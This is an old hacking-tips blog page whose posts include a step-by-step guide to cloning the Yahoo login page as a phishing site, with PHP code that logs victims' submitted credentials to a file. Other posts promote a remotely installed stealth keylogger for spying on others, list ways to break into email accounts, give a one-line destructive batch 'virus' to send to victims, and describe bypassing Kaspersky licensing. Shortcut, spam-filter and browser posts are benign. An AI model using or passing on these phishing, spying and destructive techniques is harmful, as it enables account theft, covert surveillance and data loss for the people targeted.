Write at HWS !!!

Guest Posting

How secure is your Computer ?

Check out your computer safety here . A lot of tools , tricks and hacks related to computer .

Blogger Tips and Tricks

A Lot of tips ,tricks and hacks related to blogger . Seo tricks to get maximum targetted traffic to your blog.

Easy ways to Earn Online

Online earning is not so difficult but it needs a lot of patience and hardwork. Here are some techniques to earn money through internet.

Facebook Tricks

A lot of facebook tips , tricks and hacks.It requires a lot of time but reading is must.

Pro Hacking

If you have knowledge about basic techniques then try this,but be careful as it is highly toxic.

Tuesday, March 31, 2009

Hack yahoo using fake login page

Fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.



Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page - Procedure



STEP 1.
Go to the Yahoo login page by typing the following URL.

mail.yahoo.com


STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.
Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP


Tip: 110mb.com supports PHP

STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of requst


header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;









Friday, March 27, 2009

Hack Gmail account using keylogger

The easiest way to hack gmail is by using a keylogger(Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers

1. Sniper Spy (Remote Install Supported)


Editors Rating: 8/10



SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child
, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
4. Records any Password (Email, Login, Instant Messenger etc.)
5. Remote Monitor Entire IM conversations
 so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall



For more information on this program and download details visit the following link
SniperSpy







5 ways to Hack Email account passwords

Hack an email account


"How to hack email accounts passwords?" So many people have asked that question,and honestly its a dumb one,.There are many ways to hack an email account passwords but i am covering here 5 of them:
1.Phishing
2.Keylogging
3.Brute forcing
4.Social engineering
5.Guessing the secret question

5 ways to Hack email accounts

Phishing:
This is the most easiest way to hack an email account password Phishing is a way of saying keylogger but in an other meaning.Let’s say you want to create a hotmail phishing page.The page should look
exactly like the real one.
How does it work:

You can download/make a replica of the website you want to phish.And save is as HTML.When you’re done with that,you have to find a way
to upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats done the user types his/hers username and password.And automatically
it will be sent to you by mail.And there you have it,that’s Phishing.

For more information on see  post  How to create fake login page for any site

Brute Forcing
Brute Forcing is like guessing the password but instead you make/download a password list[a long txt file containing words that might be
the password] ad the Brute Forcer tries them all
Download your Msn Brute Forcer Here:
 [may find a trojan inside but that's normal]




Keyloggers
With keylogger you can easily hack an email account.Keyloggers is like phishing but is more simple.Its a simple .exe executable.When someone clicks it,the Keylogger auto downloads.And you’ll
have ,on your computer,you start it,and put in the ip of the destination,and every hour you’ll receive keys pressed on his computer thats an easy way to find out msn passwords  i have made a post on ,which explains best keylogger  in the trade

Social engineering:
In  Hacking and security , social engineering is a broad term used to describe a non-technical aspect of information technology crime that relies heavily,on human interaction and often involves tricking other people to break normal security procedures




Guessing The Secret Question

If you know your friends,this will be an easy task.Go to http://www.hotmail.com and click forgot password,then put in the email address
and then the CATCHA code,reply on the secret question,but beware because you have like 3 tries only.

Warning:This post "How to Hack email accounts" is is truly for educational purposes

.......






Thursday, March 26, 2009

5 ways on How to block spams on gmail

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

While Gmail doesn't filter all spam messages that could reach your inbox, it still does a better job as compared to other webmails such as Yahoo Mail or Hotmail. Apart from consistent improvements being done on Gmail's filters, the utmost ingredient that contribute to the overall effectiveness is the use of community signals.



How to block spams on gmail:

1. Block image spam
As the webmail filters get better, spam also evolves and becomes harder to block. This is particularly true when it uses images and literary texts. Here's a simple Gmail trick to divert spam messages (contain images) to the Trash folder (or any folder you specify) automatically.
Step 1: Firstly you need to go to 'Settings > Filters' and choose "Create a Filter".
Step 2: Type 'multipart/related .gif' in the 'Has the Words' field and also check the 'Has Attachment' box.

Step 3: Click next and select "Delete It" to move the spam message directly to the GMailTrash folder.
Note: There's a small chance of GMail filter triggering false positive and move few important emails from real senders to the Trash folder. To make sure this thing doesn't happen, create a new folder (label) in gmail and change the instruction to redirect all related mails to the new folder. You can sort out the mails later on during your free time.
2. The Plus Hack
If you like to sign up for internet freebies or buy things online, this tip will definitely come handy. Creating alias emails for aforementioned activities which are very likely to spam you, is an effective way to completely reduce number of spams in your Gmail mailbox. Not only you can track who is the culprit and you can also accurately learn with whom your email is shared with.
To do this, simply put a '+' after your account name and add words.
Example: I can do 'eches+online_deal@gmail' or 'eches+spammer@gmail.com'. All these mails will come into your mailbox anyway, but they can easily be filtered to a folder and even to trash them.
3. The Googlemail Hack
When you registered with Gmail account, you are actually given two email addresses
yourusername @gmail.com
yourusername @googlemail.com
You can use both without having fear the later might not reach your mailbox. Like the above trick, you can take advantage of these two domains so that less spam reaches your Gmail Inbox via filtering system.
For example you distribute 'yourusername @googlemail.com' address to your close contacts while keeping the 'yourusername @gmail.com' address for public. Set filter such that all 'yourusername @googlemail.com' to be delivered to a special folder. This is a definitive way to ensure important messages not to be diverted to Trash folder by mistake.
4. The Dot Hack
Gmail doesn’t acknowledge dots (.) in your account name. So I can use 'eches.net@gmail.com' or without any dots at all. Either way will return to 'echesnet@gmail.com'.
Again you can use the power of filter system to divert certain aliases to specific folders or directly to Trash folder.
I hope you can you use some of the tips above to reduce spams in your Gmail mailbox. Again, these tips are not definitive ways to completely eliminate spams but they can effectively reduce the spam numbers.


Gmail may be the best mail arround but it lacks some common features like blocking a spammer from sending you mails. But thankfully here is away to do this.You can send mails from a id to the Trash automatically.

5.Block spammers on gmail:
Select "create a new filter" next to search box
Type the desired email address under From:
Click Next .
Check Delete it box under Choose action.
Save it.

If you wish to blocks a entire domain type just "@example.com". (without quotation marks)
To block more than one address, separate them with "" (without quotation marks).
For eaxample you can block both spammer1@example.com and spam2@example.com by typing spammer1@example.com






Make virus in just one minute

Plx Reply and show your feed back
Here is a simple and easy trick to make a virus in less than 1 minute. :)

CAUTION: DO NOT RUN THE PROGRAM ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS.

HERE'S THE To Make the virus:

1.Go to notepad,
2. Type erase C:\WINDOWS,
3. Save IT AS SOMETHING.cmd ,
4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Take care it is a simple but powerful virus.






Tuesday, March 24, 2009

Windows shortcuts

Here are some windoes shortcut keys
Windows Shortcuts keys
Alt + E — Opens the Edit menu
Alt + Enter — Opens the Properties window
Alt + F — Opens the File menu
Alt + F4 — Closes the current program
Alt + Print — Screen Takes a screen shot of the current window or program
Alt + Tab — Switches between the programs currently in use
CTRL+TAB — SWITCHES BETWEEN TAB IN DIALOG BOX,I.E 7
Ctrl + A — Selects all text
Ctrl + C — Copies the selected object
Ctrl + End — Jumps to the end of the current document
Ctrl + Esc — Opens the Start menu
Ctrl + F4 — Closes the current program
Ctrl + Home — Jumps to the beginning of the current document
Ctrl + Insert — Copies the selected object

Ctrl + left arrow — Moves to the left one word
Ctrl + right arrow — Moves to the right one word
Ctrl + V — Pastes the selected object
Ctrl + X — Cuts the selected object
Ctrl + the “+”key — Perfectly resizes the width of Explorer columns
End — Jumps to the end of the current line
F1 — Opens the Help menu
F2 — Renames the selected icon
F3 — Launches the Search Companion in a folder or on the
desktop

F4 — Accesses the Address Bar in a folder or window
F5 — Refreshes the contents of a folder or window
Home — Jumps to the beginning of the current line
Shift + Delete — Permanently deletes files (bypasses the Recycle Bin)
Shift + End — Highlights text from the current position to the end of
the line
Shift + F10 — Substitutes for a right-click
Shift + Home — Highlights text from the current position to the
beginning of the line
Shift + Insert — Pastes the selected object
Shift while inserting — Prevents the CD player from playing an audio CD

Shortcuts for Keyboards with a “Windows”Key (Resembling a Flag)

Windows Key + E — Opens Windows Explorer
Windows Key + F — Launches the Windows Search Companion
Windows Key + F1 — Opens the Help and Support Center
Windows Key + L — Locks down Windows
Windows Key + M — Minimizes all windows and shows the desktop
Windows Key + M + Shift — Undoes the minimize
Windows Key + Opens — the System Properties window
Pause/Break key
Windows Key + R — Opens the Run window
Windows Key + U — Launches the Utility Manager
WINDOWS KEY+U — MINIMIZES ALL WINDOWS AND GOES TO DESKTOP






Saturday, March 21, 2009

Internet explorer 8 released


Internet Explorer 8 Released, Download Now



Internet Explorer 8, which Microsoft has put into beta testing since more than a year now, has finally released a few minutes ago!
Microsoft has made sure everything goes on well, and has come out with the fastest Internet Explorer ever. Lots of performance improvements and security updates have been made. I’d recommend everyone to give it a try once!

Features Overview:

Faster Internet Explorer 8 is more responsive with new pages and tabs, opening up fast and reliably. You can now get to the information you care about most, in fewer steps; one click access to your webmail, favorite news sites or other online services.
Easier Reduce the steps to accomplish many common tasks, and automate your access to real time information updates. You can keep track of your favorite sports team, news, weather with a single click.
More Private Helps protect your privacy and confidential information where ever you go on the web.
More Secure Helps protect and stop malicious software from reaching your PC, and makes it easier to detect when a website is an imposter.
Or you can check out the IE8 features review done by us.

After using the beta and RC releases, I’m impressed how Microsoft has worked hard to put IE back into the browser-war! IE8 is available for Windows XP, Vista and Server 2003 and 2008. I don’t see any IE8 links for Windows 7. Looks like, Microsoft has something else in mind for the Windows 7 users.

Download Internet Explorer 8

You can download Internet Explorer from the download page link given below.
Download now


.......






Friday, March 20, 2009

Products

Recommended products 
                                                

1.Remote pc spying softwares


2.Hacking and security books


3.IP Hiding Softwares


4.Antispywares

 







Thursday, March 19, 2009

How to open multiple yahoo


Here is the trick to open multiple yahoo...
Yahoo Messenger trick-How to open Multiple Yahoo Messenger???
1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's.






How to delete undetecteble file in windows xp


TOday ill tell u how to delete undetecteble file on XP. They are not deleted simply and a message appears that "access denied" There is a simple way to delete those files. Read this carefully.

Click on Start, Search, All Files and Folders.

Right-click on file and choose properties

file location example: c:\windows\system32\undeleteablefile.exe


Open a Command Prompt window

Again Click on Start button, Run and type TASKMGR.EXE and press Enter to start Task manager
Click on the Processes tab, click on the process named Explorer.exe and click on End Process.

Minimize Task Manager.

Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command.

cd \windows\system32

Type DEL where is the file you wish to delete.

Example: del undeletablefile.exe

Go back to Task Manager

In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.

Close Task Manager and the file is deleted.






Use Kaspersky without a key




Kaspersky is one of the world,s best antiviruses,but unfortunately its full version is not availible,there are many keys availible online but believe me these are only to waste your time,Your all efforts will end in smoke.
I am posting here a method to use kaspersky antivirus without a key (Temp. sol. if ur key is not Valid)



Just follow the steps:

you need to back up first in case any thing goes wrong

1.( Run ) type ( regedit ) press ( OK ).

1- Go To ( HKEY_LOCAL_MACHINESOFTWAREKasperskyLabAVP6Data ) & right click on ( Data ) & choose ( Permissions ).

2- choose ( Advanced ) From The ( Permissions For Data ) ... a new window will open.

3- On ( Advanced Security Settings for Data ) window .. look for ( Inherit from parent ... ) click on the nike or check mark to remove or uncheck it.

4- After removing the check or nike mark u will get a new message .. choose ( Remove ).

5- On ( Advanced security Settings for Data ) click on ( Apply ).

6- choose ( Yes ) for the new message that u will get.

7- Press ( OK ) on ( Advanced security Settings for Data ).

8- Press ( OK ) on ( Permissions For Data ).

9- Exit KasperSky & restart it again.
The Kaspersky icon will be GRAY but it is working perfect.
- You will have to update the database manually ... no automatic update.
- Ignore
Windows security center that the antivirus is not working ... in fact it is active.
-



.......






Download video from youtube with out software


Here is the easiest way to download any video from Youtube.

While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2

then add the word ‘kick’ between www. and youtube.com/link…….

EXAMPLE: www.kickyoutube.com/watch?v=sasad7657dms2

That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me. Enjoy :)

.......






Sunday, March 15, 2009

Disclaimer

"Learn How to hack" is not a blog which promotes encourages and exite hackers,But its purpose is to aware people that what is going around. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks. Know Hacking but No Hacking!


Difference b/w ethical hacking and non Etihcal hacking:




ETHICAL HACKING:


The practice of breaking into computers without malicious intent, simply to find security hazards and report them to the people responsible.
The concept of "ethical hacking" is questionable because most people do notwant strangers trying to break into their computers, no matter how benign the motives. Malicious crackers almost always claim to be "ethical hackers" when caught.We do not allow strangers to attempt "ethical lockpicking" or "ethical burglary." Experiments to test the security of a system should only be done with the advance permission of the victim.




NON ETHICAL HACKING:


.They may use computers to attack systems for profit, for fun, or for political motivations or as a part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorization and hence they should not be confused with ethical hackers.
They also may distribute computer viruses, Internet worms, and deliver spam through the use of botnets. The term may also refer to hackers who crack software to remove protection methods: copy prevention, trial/demo version, serial number, hardware key, date checks, CD check (NO-CD) or software annoyances like nag screens and adware.


Few articles (posts) on this site may contain the information related Hacking not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorised access.


Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided on this site.


Warning:Hacking is a crime and we are not responsible for the way you use it


.......






Saturday, March 14, 2009

Hacking tools

Hacking tools:
A hacking tool is a program designed to assist with hacking, or a legitimate utility that can also be used for hacking. Examples include Nmap, Nessus Remote Security Scanner, John the Ripper, SuperScan, p0f, and Winzapper. Chocolate has also been designated as among the most potent hacking tools, due to its potential exploitation in social engineering attacks. Occasionally, common software such as ActiveX is exploited as a hacking tool as well.

Here is the list of some great hacking tools
NMAP
Nmap is distributed with source code under the terms of the GNU General Public License and is a utility for network exploration or security auditing. Hackers have misused this program and administrators use it to find vulnerabilities.

Hidden object Locator

With this tool you can easily find hidden NDS objects in your tree. This download consist of two files an NLM file and a text with instructions.

Folder lock:Folder lockis a file-security program that can password-protect, lock, hide and encrypt any number of files, folders, drives, pictures and documents This can even protect files on USB flash drives, memory sticks and other media.

Super Win Spy
WinSpy is a program designed to find out what has been done on your computer. You find out web sites visited, images, text, movies and files opened/saved or other details.

IPPL

This is a daemon which logs the various IP packets sent to a a computer. It also displays information on the incoming packets and which can be logged and which need not.

scanlogd - a port scan detection toolscanlogd is a port scan detection tool that can help the IDS developer to deal with intrusion. This is an open source tool distributed under GNU lisence






Contact us

If you have a specific question you'd like answered, or simply want to get in touch then contact us here , However we receive large volume of email on daily basis to its really difficult for us to respond to every request.







*

*

*

*
*
contact form faq verification image






Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Join Me On Facebook

200+ Followers

Followers


meet women in Ukraine contatore visite website counter

Recent Comments

Follow Me On Twitter

1112+ Followers